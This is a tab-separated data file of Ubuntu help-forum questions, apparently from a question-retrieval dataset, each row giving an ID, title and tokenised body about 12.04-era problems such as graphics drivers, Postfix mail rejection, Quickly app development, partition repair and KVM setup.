155562	ready-to-use time and/or datetime selection widgets for gtk3 ?	i 've checked hamster-applet , gnome-control-center datetime and gnome-schedule . they all define a different datetime selection composed from basic widgets . i 'm surprised it was n't made available as a single widget . did i miss it somewhere ?
155563	help with usb wireless network	i 've problem with my usb network reciever belkin . i ca n't get it to work . i 've cd with drivers , are they only for windows ? if i start ubuntu and try to click install.exe does n't work . i 'm getting message like : archive : /media/f7d4101v1/setup.exe zip file size : 4911104 bytes , number of entries : 29824 [ /media/f7d4101v1/setup.exe ] : zipfile is disk 34294 of a multi-disk archive , and this is not the disk on which the central zipfile directory begins ( disk 3569 ) . i 'm new to linux , looks nice and all , but i ca n't to connect to my wireless network which make it usless . btw , everything works fine on windows .
155564	i ca n't install oracle j2ee jdk	i ca n't install oracle jdk j2ee like i show in the pix below this is my java ( oracle j2se jdk ) configuration when i typed which java , terminal showed this how should i do ? i 'm very pleased for your help . sorry for my english
155568	can not install ati/amd fglrx restricted graphic drivers	when i try and install the ati/amd proprietary fglrx graphic drivers ( post release update ) i get an error to read a log file . here is the log : http : //pastebin.com/rtlnzvxz
155575	can not receive email on ubuntu email server	i setup the email server . i am able to send out mail but when i try to receive mail by sending an email to myself from another email , it does n't work . the other email i receive a mailer-daemon and this one shows as a reject . this is the error that i get in ( /var/log/mail.log ) : jun 24 19:17:31 localhost postfix/smtpd [ 13352 ] : connect from mail-lb0-f173.google.com [ 209.85.217.173 ] jun 24 19:17:31 localhost postfix/trivial-rewrite [ 13329 ] : warning : do not list domain socialbaked.com in both mydestination and virtual_mailbox_domains jun 24 19:17:31 localhost postfix/smtpd [ 13352 ] : noqueue : reject : rcpt from mail-lb0-f173.google.com [ 209.85.217.173 ] : 550 5.1.1 < sarmenb @ mydomain.com > : recipient address rejected : user unknown in local recipient table ; from= < sarmenhb @ my-gmail.com > to= < sarmenb @ mydomain.com > proto=esmtp helo= < mail-lb0-f173.google.com > jun 24 19:17:31 localhost postfix/smtpd [ 13352 ] : disconnect from mail-lb0-f173.google.com [ 209.85.217.173 ] jun 24 19:19:38 localhost postfix/master [ 2102 ] : daemon started -- version 2.7.0 , configuration /etc/postfix jun 24 19:19:39 localhost dovecot : dovecot v1.2.9 starting up ( core dumps disabled ) jun 24 19:19:39 localhost dovecot : auth-worker ( default ) : mysql : connected to 127.0.0.1 ( mail ) jun 24 19:19:41 localhost postfix/master [ 2102 ] : reload -- version 2.7.0 , configuration /etc/postfix
155579	how do i create program launcher on gnome classic desktop ?	i am using the gnome classic desktop for my ubuntu 12.04 pc . one of the thing that i am not able to do at the moment is placing program launchers ( plus icon ) on the desktop . i can create an item for the program on the 'applications ' menu but i prefer clicking on an icon on the desktop to launch a program . anybody can give me pointers on how to do this ?
155581	how can i add new window to my project in using quickly ?	i 'm new to glade and python . but the code generated by quickly when making my first app is so much confused for me to understand . i do n't know where should i add the code to initialized my new window , i think connecting it to button should be easy .
155584	moving 11.10 complete system to a new bigger harddisk	i would like to move my current installation of ubuntu 11.10 to a bigger harddisk , since the old one is failing . i would like to avoid solutions like dd block copying ( since there would be unused space at the end ) with something cleaner , but i 'm open to suggestions . partitions info : size used avail use % mounted on partition type encrypted 19g 9.9g 7.6g 57 % / ext4 59g 50g 6.2g 90 % /home ext4 yes what is the best way to accomplish such a task , preferably with advantages/disadvantages of any given approach .
155586	problem with python3 picking python2 package	i installed python3-numpy package , but trying to import it in python3 interpreter i get this : $ python3 python 3.2.3 ( default , may 3 2012 , 15:54:42 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import numpy traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /home/zetah/.local/lib/python2.7/site-packages/numpy/__init__.py '' , line 128 , in < module > from version import git_revision as __git_revision__ importerror : no module named version > > > looking in synaptic i see python3-numpy is installed in /usr/lib/python3/dist-packages/numpy/ why is it picking wrong package and what can i do to remedy this ?
155592	how can i change trash icon in unity	i 've changed so many icons individually by using main menu . now i want to change icons of trash ( empty and full trash ) with some png but i do n't know what to do . i 'm using ubuntu 12.04
155593	upgraded from 11.10 to 12.04 now no network access	a few weeks ago i decided i should enter the linux world and read that ubuntu is the most widely used release . i installed version 11.10 and it worked perfectly . just this past week i decided i would do the upgrade to 12.04 . the upgrade process itself worked fine . however , when i logged in i no longer had a network connection . i am running an amd-based pc with a d-link dfe-530txs network card and as i said , it worked fine in 11.10 . i have scoured the internet and come across a thousand slightly varying solutions , but they are too convoluted for someone new to linux . not because i ca n't follow the steps , but because most of the tools/utilities that are referenced ( e.g . to compile , install , etc . ) are not available when i use the stated steps in the solutions . so ... .should i re-install 11.10 or is there hope in getting this version to use the nic that i know works . i have the latest driver from d-link for my nic but i have no idea how to 'install ' it for ubuntu 12.04 to use . i know you will require additional information , but i was n't sure what you would need . thanks in advance . thanks for the tip . to answer your question , the d-link dfe-530txs is a 10/100 ethernet nic . slight edit to this response to your tip . now when i view the network configuration tool , i see what i saw from immediately after the upgrade to 12.04 . for my wired connection 1 , it has the comment `` cable unplugged '' . as so many other people on here have commented , the cable is very much plugged in . the same cable was tested on another computer and it works just fine so i know the switch is o.k . as well . is there a way to just wipe the slate clean by removing any and all network related settings , devices , etc . and having it all re-detected ? thanks
155595	how to use `chown` and `chmod` to make a `` pipe '' or `` pass through '' link from guest directory to elsewhere	i want to either extend the size of my guest partition or figure out how to copy stuff from the guest partition to my normal /home directory . ( because of some other problems i can only run xorg as guest , but i can log into virtual console as myself or root . ) here 's the motivation : i want to torrent a large file . it 's larger than my guest filesystem . but i have plenty of space on my real drive , i just ca n't log into it graphically . so i tried to set up a `` pipe '' to get the file out of the tmpfs . i did : su -u myself # catch mkdir ~/receiver_dir sudo su cd /tmp/guest-lkj567uio/ # throw ln -s mario_pipe /home/myself/receiver_dir chown -r guest-lkj567uio /home/myself/receiver_dir chown -r guest-lkj567uio /tmp/guest-lkj567uio/mario_pipe chmod -r a+rw /home/myself/receiver_dir chmod -r a+rw /tmp/guest-lkj567uio/mario_pipe su -u guest-lkj567uio cd /tmp/guest-lkj567uio cd mario_pipe touch something # success ! however , when i try to torrent to /tmp/guest-lkj567uio/mario_pipe , transmission says i do n't have write permissions . but it looks like i just wrote there ? and that everybody ( a+rw ) can write there in fact ? maybe this indicates i do n't actually understand chown and chmod but nothing from their man pages pops out .
155596	impossible quandrary involving uck , graphics card , and nvidia drivers	i have a computer that i want to install ubuntu on . it is an older gaming computer with a nvidia graphics card . when i attempt to boot any unmodified linux distribution onto it , i get a `` boot error '' message , which i assume is because the computer uses a discrete graphics card , which the linux kernel does not have support for . ordinarily , that would not be a problem , as i would just plug the monitor into the vga port built in to the motherboard . however , this particular model of motherboard does not have an on-board graphics connector , so i am stuck with using the graphics card connection . that further would not be a problem ; all i would have to do would be to use uck to create a customized ubuntu image that included the graphics drivers . except for the fact that the nvidia linux drivers must be installed on a computer with a nvidia graphics card present . so while using uck , the driver installer fails with a message stating that there is no nvidia graphics card present . how do i get ubuntu on my desktop computer ? edit : i have a computer with a dual core ( quad with hyper-threading ) intel pentium extreme edition , an intel d975xbx motherboard , 4 gb of ddr2 memory , and a nvidia geforce gts 450 .
155597	quickly ubuntu-application + indicator template do n't work	i 've started to work with quickly and python ( because i wanted to have some gtk3 integration and create and appindicator ) , and so i create the projecto like this : quickly create ubuntu-application ualarm cd ualarm quickly run and the application launched . but then i tried to add the appindicator like this : quickly add indicator and since then the application does n't start anymore and this error appear : aliasbody @ bodyubuntu-pc : ~/projectos/ualarm $ quickly run ( ualarm:8515 ) : gtk-warning ** : theme parsing error : gnome-panel.css:28:11 : not using units is deprecated . assuming 'px ' . /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `window ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) traceback ( most recent call last ) : file `` bin/ualarm '' , line 33 , in < module > ualarm.main ( ) file `` /home/aliasbody/projectos/ualarm/ualarm/__init__.py '' , line 33 , in main window = ualarmwindow.ualarmwindow ( ) file `` /home/aliasbody/projectos/ualarm/ualarm_lib/window.py '' , line 35 , in __new__ new_object.finish_initializing ( builder ) file `` /home/aliasbody/projectos/ualarm/ualarm/ualarmwindow.py '' , line 24 , in finish_initializing super ( ualarmwindow , self ) .finish_initializing ( builder ) file `` /home/aliasbody/projectos/ualarm/ualarm_lib/window.py '' , line 75 , in finish_initializing self.indicator = indicator.new_application_indicator ( self ) file `` /home/aliasbody/projectos/ualarm/ualarm/indicator.py '' , line 52 , in new_application_indicator ind = indicator ( window ) file `` /home/aliasbody/projectos/ualarm/ualarm/indicator.py '' , line 20 , in __init__ self.indicator = appindicator3.indicator ( 'ualarm ' , '' , appindicator3.indicatorcategory.application_status ) typeerror : gobject.__init__ ( ) takes exactly 0 arguments ( 3 given ) how can i solve this problem ?
155602	is there a tool to make partition bootable ?	i tried windows 8 consumer preview a couple months ago and it wiped out my partition table ... or the boot information . so now the machine can not boot to anything at all . is there ubuntu tools or linux tools that can fix all the partitions and make them boot again ? ( the partitions have windows 7 and vista on them . i run ubuntu as a vm on win 7 ) . i tried another tool running on vista and was able to see the win 7 partition , except that tool wiped out the vista boot info later on . update : per @ mlt 's request , this is what fdisk -l says ; ubuntu @ ubuntu : ~ $ sudo fdisk -l /dev/sda disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1aca8ea5 device boot start end blocks id system /dev/sda1 284993226 350602558 32804666+ 7 hpfs/ntfs/exfat
155603	how to use events ( gdkevents ) in glade	when selecting a widget , in the common tab you can find the events control . what is it for ? how to use it ? thanks !
155606	ca n't get ubuntu 12.04 to set pixel resolution higher than 1360x768	ca n't get ubuntu 12.04 to set pixel resolution higher than 1360x768 . very new to linux liking it other than this lol . i have a dell xps 420 with a nvidia geforce 260 hooked up to my 55 inch tv through a dvi/hdmi adapter.the display program wont set the resolution above 1360x768.i have tried the two `` additional driver '' options for the graphics card and the details window does n't recognise with either driver .
155610	why does nickserv on freenode irc ask me to identify every day ?	i am using empathy as an irc client .
155611	no unity-greeter.conf file in /etc/lightdm/	i am running ubuntu 12.04 with gnome-shell . i have two admin user accounts . now , i used to know that in precise we can set different different login wallpaper to different different user , so i tried with : sudo dbus-send -- system -- print-reply -- dest=org.freedesktop.accounts /org/freedesktop/accounts/user1001 org.freedesktop.accounts.user.setbackgroundfile string : /usr/share/backgrounds/green-wallpaper-27.jpg but to no avail . then i tried sudo xhost +si : localuser : lightdm sudo su lightdm -s /bin/bash gsettings set com.canonical.unity-greeter background '/path/to/the/wallpaper.png' it does change my login wallpaper but for all users . then i tried to locate /etc/lightdm/unity-greeter.conf but i found that it is not there . so where is it and how can i set different login wallpapers for different users ?
155615	nvidia geforce gt-520m-cn on intel dh61ww ubuntu 12.04	i have this desktop : i7 2600 , 8gb ram ddr3 , board intel dh61ww , geforce nvidia gt520-cn 2gb ddr3 , i just installed ubuntu 12.04 64-bit ( kernel 3.2.0-23-generic ) . i want to setup two samsung 22 '' led monitors and get my video card drivers working . i downloaded and installed nvidia driver 295.59 . i tried the following with that driver and also with 302.17 . i ran these commands : sudo apt-get update sudo apt-get upgrade sudo apt-get install build-essential linux-headers- $ ( uname -r ) , sudo apt-get remove -- purge nvidia* , sudo apt-get remove -- purge xserver-xorg-video-nouveau vim /etc/modprobe.d/blacklist.conf in the vim text editor , i added the following lines to blacklist.conf : blacklist vga16fb blacklist nouveau blacklist rivafb blacklist nvidiafb blacklist rivatv then i ran these commands : sh nvidia.run sudo service lightdm start i rebooted , and after rebooting ran : nvidia-xorgconf after reboot i got a screen resolution of 800x600 . i ran nvidia-settings and it said : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . 3 ) i changed xorg.conf slightly to set up a resolution to work property . 4 ) i do n't have any image on my monitor and i dont have any option in the nvidia x server settings . $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf119 [ geforce gt 520 ] ( rev a1 ) $ egrep -i 'glx|nvidia ' /var/log/xorg.0.log [ 12.005 ] ( ii ) loadmodule : `` glx '' [ 12.005 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 12.575 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 12.585 ] ( ii ) nvidia glx module 302.17 tue jun 12 16:22:45 pdt 2012 [ 12.585 ] ( ii ) loading extension glx [ 13.037 ] ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) [ 13.044 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=3 ( /dev/input/event10 ) [ 13.044 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=7 ( /dev/input/event9 ) $ glxinfo | grep direct xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig what can i do to fix this and get video working on my ubuntu system ?
155616	why does update manager give me a `type not known ' error with a ppa ?	i got this message when i was using update manager : e : type 'ppa.launchpad.net/otto-kesselgulasch/gimp/ubuntu ' is not known on line 2 in source list /etc/apt/sources.list.d /otto-kesselgulasch-gimp-precise.list how do i solve it ?
155619	i ca n't submit my app to the ubuntu app showdown	please , give me some help : 1 . the version of my quickly is 0.4.3 . can i use this version or i must to renew it ? how can i do this ? 2 . when i am using dput utility to submit it says that there are no sign in my .changes file . what should i do ? 3 . when i am using quickly release utility to submit it says that it ca n't find project . what should i do ? i 'm glad that you would help me .
155621	how to efficiently preserve a really big navigation history in firefox ?	when i was using mac , my firefox stored items in its history for really long times . sometimes i needed to find a link to a site i have seen two years ago and it found it ! also , the autocomplete in the firefox bar is really great , so a long history and the autocompleting yield a wonderful feature to me . unfortunately , it seems this does not happen in ubuntu 's firefox . i looked for solutions but i just got some firefox developers saying the option of expanding history is out for performance issues and one is well advised to not try to change it ( which read to me as saying `` we can not make it work well so we limit the scope '' ) . anyway , my question is : is there a way of efficiently expand the size of firefox history ? sorry for my bitterness , but a solution with strings attached ( mostly say that i should not do it , like this addon ) is not solution for me . does someone have the same need of mine and found a solution ?
155624	`` quickly submitubuntu '' does n't install app in /opt directory	according to the ubuntu app showdown rules ( http : //developer.ubuntu.com/showdown/rules/ ) , `` quickly installs your app to /opt for you when you run quickly submitubuntu . '' however there 's nothing in the /opt directory after running `` quickly submitubuntu '' . what can i do ? edit : result of running `` quickly submitubuntu '' launchpad connection is ok ... ... ... ... ... .ubuntu packaging created in debian/ ... ..pushing to launchpad ... ... ... ... ... ... ... ... ... ..checking signature on .changes gpg : signature made mon 25 jun 2012 03:34:15 pm edt using rsa key id 397c7008 gpg : good signature from `` david pan < david pan > '' good signature on ../indicator-launchertoggle_12.06.3_source.changes . checking signature on .dsc gpg : signature made mon 25 jun 2012 03:34:15 pm edt using rsa key id 397c7008 gpg : good signature from `` david pan < david pan > '' good signature on ../indicator-launchertoggle_12.06.3.dsc . uploading to ppa ( via ftp to ppa.launchpad.net ) : uploading indicator-launchertoggle_12.06.3.dsc : done . uploading indicator-launchertoggle_12.06.3.tar.gz : done . uploading indicator-launchertoggle_12.06.3_source.changes : done . successfully uploaded packages . calling gpg to create tarball signature ... indicator-launchertoggle 12.06.3 released and submitted to ubuntu . wait for half an hour and have look at https : //launchpad.net/~napdivad/+archive/ppa . then your application will be reviewed by the application review board .
155629	ubuntu 12.04 video issue on dell inspiron 1100	i have an old clunker - dell inspiron 1100 with a32 bios . i managed to install correctly from a usb drive , and the screen showed graphics in full natice 1024 x 768 - as did the 'try from usb ' ubuntu option . once i committed to a full install on the hdd , the video resolution comes up as 640 x 480 with no other resolutions to change to full screen . does anyone have some advice to allow the full lcd panel to be used ? thanks for reading ed
155639	how to download `` internet download manager '' ( idm ) .deb file ?	i 'm running ubuntu 12.04 lts on a laptop , and i need internet download manager.deb file so that i can install it . please provide me the link download this file .
155646	unable to use goocanvas in the simple-player tutorial	i 'm trying to go through the simple-player tutorial . everything seems okay , after resolving the gtk.response_ok and quickly.prompts problems , i reach the part where one starts messing around with goocanvas . unfortunately , import goocanvas causes $ quickly run to throw : /usr/lib/python2.7/dist-packages/gobject/constants.py:24 : warning : g_boxed_type_register_static : assertion `g_type_from_name ( name ) == 0 ' failed import gobject._gobject /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : specified class size for type `pygtkgenericcellrenderer ' is smaller than the parent type 's `gtkcellrenderer ' class size from gtk import _gtk /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40 : warning : g_type_get_qdata : assertion `node ! = null ' failed from gtk import _gtk after which the application exits . with the other errors , it suggests to me that the tutorial and the goocanvas library are both out of date and not cooperating with the new gtk+3/gobject stuff . if this is the case , could someone please refer me to alternatives ? many thanks in advance . i am running 64 bit ubuntu 12.04 lts .
155647	how do i use my own folder structure with shotwell ?	i want to organize my photos as follows : my own folder structure , not date-based not in ~/pictures automatically detect new photos in my folder structure ( including in subfolders ) do not create copies of the photos ( i need the harddrive space ! ) is this possible with shotwell , and how do i do it ? i really do n't want shotwell to move my files around .
155648	wubi 12.04 installation error executing command command	i have tried to install wubi but have not had luck because there is an error executing command : > > command=c : \users\me\appdata\local\temp\pyl4266.tmp\bin\resize2fs.exe-f c : \ubuntu\disks\root.disk 17744m > > retval=1 > > stderr= > > stdout=resize2fs1.40.6 ( 09-feb-2008 ) usage : /cygdrive/c/users/eriks/appdata/local/temp/pyl4266.tmp/bin/resize2fs.exe-f c : /ubuntu/disks.root.disk17744m [ -d debug_flags ] [ -f ] [ -f ] [ -p ] device [ new_size ] i do not understand what is the problem . here is my log file . https : //skydrive.live.com/redir ? resid=b4f19ca027ffad89 ! 324 please let me know what can be done to fix this error .
155651	btrfs with multi devices fails automount in fstab	i 'm trying to automount btrfs on 12.04-desktop-amd64 . during bootsplash , fstab failed to mount btrfs and asked skip or manually prepare . on the rootshell , btrfs device scan and mount -a could automount properly . it seems `` btrfs device scan '' was missing from bootstrap . where should i add the line to prepare bootstrap ?
155653	does wubi need seperate partition ? can i manually allocate space for my home folder ?	i 'm using ubuntu 12.04 , but there are some programs like autocad , solidworks and comsol multyphysics , that can run only on a windows system . i decided to reinstall my laptop , so i will install first windows xp and then ubuntu 12.04 again . while installing windows - do i have to make 2 partitions ( one for xp and another for ubuntu ) or at the next step , when i 'm going to install ubuntu , i can do it ? if i 'm installing ubuntu with wubi , can i decide how much space will be my home folder , or it 's doing everything automatically ?
155658	please provide me the way to download `` youtube video downloader ''	please tell me the way to download youtube video downloader ... .. os : ubuntu 12.04
155673	a question about `` add-apt-repository '' ( gcc 4.7 or bumblebee )	i installed ubuntu 12.04 in my notebook and i use c++ . i want to use c++11 , so i want to upgrade my gcc to gcc-4.7 . i ran these commands : sudo add-apt-repository ppa : ubuntu-toolchain-r/test sudo apt-get update sudo apt-get install gcc-4.7 sudo apt-get install g++-4.7 but when i ran sudo apt-get install gcc-4.7 , it can find gcc-4.7-base but not gcc-4.7 . and when i ran sudo apt-get install g++-4.7 , it could not find anything . today , i wanted to install bumblebee so i started to run these commands : sudo add-apt-repository ppa : bumblebee/stable sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia sudo reboot but when i ran sudo apt-get install bumblebee bumblebee-nvidia , it told me the packages could n't be found . i used the ubuntu 12.04 methods described here and here . what can i do ?
155679	how to enable numlock at boot time for login screen ?	i am trying to force numlock to be on upon initial boot at the login screen on ubuntu 12.04 . the only solutions i have found so far switch numlock on only after initial login . i 'm looking to force numlock to be on when the login screen is displayed , and before the user has logged in . can anyone assist ?
155682	'evernote 4.5.7 'could not connect to server ' error	i 've installed evernote 4.5.7 with wine 1.4 , but when i start the evernote application , a small dialogue appears saying : could not connect to server . you need to be online to register or perform an initial sync . please check your internet connection . but which internet connection ? i am connected to the internet . do i need to install a browser in wine to connect to the internet ? i do n't understand .
155690	ca n't install packages ubuntu 12.04	i 'm trying to install software by using apt-get and ubuntu software center ui , when i try the ubuntu software center it gets stuck saying installing and installs nothing and when i try the apt-get it gets stuck at the point `` 0 % [ waiting for headers ] '' i tried modifying sources.list file . i installed ubuntu this morning . do you have any suggestions for me ? thanks in advance for your time . edit : after a while , i get the error 502 bad gateway
155693	no gui , no internet connection , please help 12.04	i am new to ubuntu and i tried to install ubuntu server 12.04 on my laptop . now my problem is - i am unable to connect to the internet ( i have wifi only connection ) . ubuntu did n't recognize my built-in wifi on my toshiba satellite l505 . there is no gui . i have terminal only , i tried sudo apt-get update but i am getting errer msg because of no connection . 1 . i need to know if there is any possible way that i can download and install driver for my wifi . 2. what other option do i have to be able to update ubuntu . thanks kb
155694	would the use of nepomuk be allowed in the app developer contest ?	ive recently switched to the platform and do n't remember if installed it or it came with the system . would nepomuk be considered part of the allowed packages ?
155696	how to tab-complete directories when in symlinked directory ?	i have a symlink : /path/to/foo - > /path/to/bar/foo when in /path/to/foo i might want to cd to /path/to/bar/foo : $ cd ../ tab then nothing autocompletes . i can still cd just fine by typing in the directory `` bar '' , though . why is that ? is there a setting or trick i can apply to have that tab-complete too ?
155699	ubuntu 12.04 lts does not pick up my samsung galaxy s 2 for music transfer	i 'm currently using shotwell for pictures but computer wont detect samsung galaxy s2 for music transfer . any suggested programmes out there ? all answers welcome and appreciated . currently using bluetooth which takes forever
155701	kvm in ubuntu desktop	it 's possible install kvm in ubuntu desktop version , or it only could be installed in server version . forums always explain over server version , i 'm wandering if desktop version could do the same . thanks in advance .
155707	set installer background / not able to run early_command in custom preseed file	i have a custom preseed file for a precise live cd ( which is well loaded on boot , i checked syslog for that ) . my initial problem is that when booting in install mode ( default behavior for a live cd ) , ubiquity runs x with a default wallpaper which is hardcoded to /usr/share/backgrounds/warty-final-ubuntu.png in ubiquity code . so my idea was to run early_command ( https : //help.ubuntu.com/12.04/installation-guide/i386/preseed-advanced.html ) to copy my custom wallpaper over /usr/share/backgrounds/warty-final-ubuntu.png . assuming my custom wallpaper allready resides on the rootfs in /usr/share/backgrounds . but ... it seems the early_command never runs ( and i 'm sure the preseed file is taken into account ) here is what i have added to my preseed file : d-i preseed/early_command string cp /usr/share/backgrounds/mywallpaper-defaults.jpg /usr/share/backgrounds/warty-final-ubuntu.png even this one is never run : d-i preseed/early_command string /usr/bin/touch /tmp/testearly thanks for helping ! !
155713	autostart apps in different desktops in openbox	i would like to start many gui apps within openbox , so every window was fullscreen in different desktop . is there possibility to run app in specific desktop in openbox ? or any other idea how to write openbox autostart so its starts apps in different desktops ?
155714	can something be installed in /usr by my app showdown project ?	i am working on a project for ubuntu app showdown contest ( https : //launchpad.net/wuuzy ) and i wanted to know if it is possible to install things like libraries in /usr . my project , in fact , use an extension system to improve itself with more options . it is like a plugin system and it generates libs which are currently installed in /usr . also my app generates a gir file installed in /usr/lib/girepository-1.0/ and in /usr/local/share/gir-1.0/ . it uses also a gsettings schema which is installed /usr/share/glib-2.0/schemas/ . naturally i install also the .desktop file in /usr/share/applications even if i have a copy of it in /opt/project . so what i really want to know is if this installations targets are allowed for an app which want to join to the ubuntu app showdown contest .
155715	trying to create a gtktreeview from python , does n't seem to work	i 'm writing an app using gtk/pygi , and i need to create a sidebar with a nautilus-like tree . however , gtk refuses to cooperate with me . i tried both with glade and gtkbuilder ( creating the gtktreestore with one gchararray column ) and with this code : def create_widgets ( self ) : self.hbox = gtk.box ( orientation = gtk.orientation.horizontal ) self.add ( self.hbox ) self.treestore = gtk.treestore ( str ) self.treeview = gtk.treeview ( self.treestore ) self.treestore.append ( [ `` item 1 '' ] ) self.treestore.append ( [ `` item 2 '' ] ) self.hbox.pack_start ( self.treeview , true , true , 0 ) both versions raise a typeerror : expected gtk.treeiter , but got structmeta starting at the first self.treestore.append ( ) in my code and trickling down through the library 's files . i thought it 's because gtktreestore 's .append also takes a gtktreeiter , but if i pass something like `` 0 '' as the first argument nothing changes , if i pass something like self.treestore.get_iter ( `` 0 '' ) it errors out saying it 's an invalid tree path , and if i pass none it works , but shows an empty window . i tried replacing the gtktreestore with a gtkliststore . the result does n't error out - instead , it shows the very same empty window as before . so , what am i doing wrong ? i went through the docs time and time again , but i still ca n't figure it out .
155716	configuring the dnsmasq instance started by connection sharing in networkmanager	i 've got a laptop running ubuntu 12.04 that is sharing its wifi connection to another machine through the eth0 interface using networkmanager . this seems to be done by dnsmasq . now i need to set up pxe/tftp booting on the other machine , so i 'd like to configure the dnsmasq instance that is spawned through networkmanager to add a couple of lines for pxe/tftp . how is this done ? it seems to ignore /etc/dnsmasq.conf . previous answers seem to indicate that the configuration is hardcoded into networkmanager . is this still the case ? if so , is there an easy way to achieve what i 'm trying to do here ? i suppose i could just disable the network sharing in networkmanager and set it up manually , but i 'd rather keep this all managed in one place if it all possible . edit : indeed , it seems the dnsmasq configuration is still hardcoded in networkmanager . see source here . it seems to me that it would be a much better solution to simply specify an alternate dnsmasq.conf file here , but i 'm sure there are issues i have n't considered .
155717	i have installed ubuntu alongside windows vista but ubuntu wo n't run	i installed ubuntu on my pc alongside windows vista when i choose to boot ubuntu the pc does n't run . can anyone help ?
155726	how do i deploy a virtualized server on a headless machine running 12.04 server ?	there is so much different information out there about setting up a virtual machine but i 'm at a lost where to start . my fundamental question is : how do i virtually deploy a web server ( complete with a unique set of users ) on top of the headless machine that i 'm running ? the things that make my particular system unique ( i.e . makes it hard for me to find information via google ) : server is wireless . server does n't run a gui . most tutorials/howtos assume a wired connection and/or a gui . what i 've tried i 've read documentation for libvirt , qemu , and kvm . i 've also seen a number of tutorials that use ubuntu-vm-builder or qemu-img . i 'm just not sure where to start . i 'm not sure how to think about the entire stack : i think it looks like this : libvirt -- controls -- > qemu -- controls -- > kvm . but i 'm not sure . i 've turned on virtualization through the bios on my system . i 've installed the qemu* and libvirt* packages . i 've tried to run qemu-system-x86_64 ubuntu-server-12.04.iso with the downloaded server iso . this did n't work . challenges i have n't found the answers to yet . what are the canonical steps to get a virtualized server running ? do you start with qemu-img ? or does the first step begin with ubuntu-vm-builder ? how do you keep it running every time your physical server boots ? one tutorial noted that you could n't bridge off of a wireless card . is this still true today ? i do n't understand how to edit /etc/network/interfaces . i use wlan0 as my primary networking interface so i 'm a little tentative to mess with it since all the tutorials i 've seen assume that i 'm using eth0 . all of the tutorials i 've seen assume that i have a gui running . i do n't . how would i get the guest os to blit to the video card ( i have a video card , but ubuntu server just runs cli ) ? there are a lot of filesystems available for using qemu-img . which should i use ? there are a lot of questions stuffed into this one . sorry , but the question i care about most is at the beginning . my preference is to not to have to install xen or use virtual box .
155727	what is curl used for in ruby ?	i am a fairly new used and was looking for a way to install ruby on my laptop and came across this link : https : //rvm.io/rvm/install/ when i use the command specified there , it says curl is not installed . so can anyone tell me what exactly curl is ? thanks ! note : reading this guide is highly recommended before you install ruby ( thanks damien ) .
155733	ubuntu 12.04 not shutting down properly	when i shutdown or reboot my ubuntu 12.04 it does n't ever finish shutting down . i end up stuck on a black/blank screen and have to hold the power button to shut it down . does anyone know where i can begin debugging this issue ? thanks in advance
155734	how to replace the ubuntu font with other fonts for general text display ?	how to replace the ubuntu font with the windows cleartype font , mac os x font or other fonts for general text display ( given that you have the neccesary files ) ?
155743	how to download the official man pages from the manpages.ubuntu.com for offline viewing	i am talking about this precise man pages . from here i want the entire available english language man pages as it is , so i can view them offline in the same format .simply browser way , which also makes it portable for reditribution . i am aware that it can be accessed through command line , but the official site provides attractive description ( makes a beginner like me less afraid in reading , learning and understanding them ) . by what means and in what way should it be done to achieve the desired man pages in same format . using ubuntu 12.04 64-bit edition . p.s . : also is there any way of knowing its size before downloading it .
155745	about root privilages for my application	hello i am going to make certain application which requires root privileges to run . i am using quickly for that application . how to use sudo , gksudo or anything else for that application to run ?
155748	how do i mount a `` disksecure multiboot '' partition ?	for a hard drive that has 4 or 5 partitions , i was able to mount one of them using ubuntu livecd : sudo mount /dev/sda1 /mnt but is there a way to mount to the other partitions ? ( if using sudo fdisk -l , it only shows /dev/sda ) gparted 's snapshot is : right now , the fdisk info is as follows : ubuntu @ ubuntu : ~ $ sudo fdisk -l /dev/sda disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1aca8ea5 device boot start end blocks id system /dev/sda1 284993226 350602558 32804666+ 7 hpfs/ntfs/exfat and then ubuntu @ ubuntu : /mnt $ sudo fdisk -l /dev/sda1 disk /dev/sda1 : 33.6 gb , 33591978496 bytes 255 heads , 63 sectors/track , 4083 cylinders , total 65609333 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2052474d this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sda1p1 ? 6579571 1924427647 958924038+ 70 disksecure multi-boot /dev/sda1p2 ? 1953251627 3771827541 909287957+ 43 unknown /dev/sda1p3 ? 225735265 225735274 5 72 unknown /dev/sda1p4 2642411520 2642463409 25945 0 empty partition table entries are not in disk order per @ lgarzo 's request , parted info is : ubuntu @ ubuntu : /mnt $ sudo parted /dev/sda print model : ata st3320820as ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 146gb 180gb 33.6gb primary ntfs boot the command sudo mount /dev/sda1p2 /mnt wo n't work .
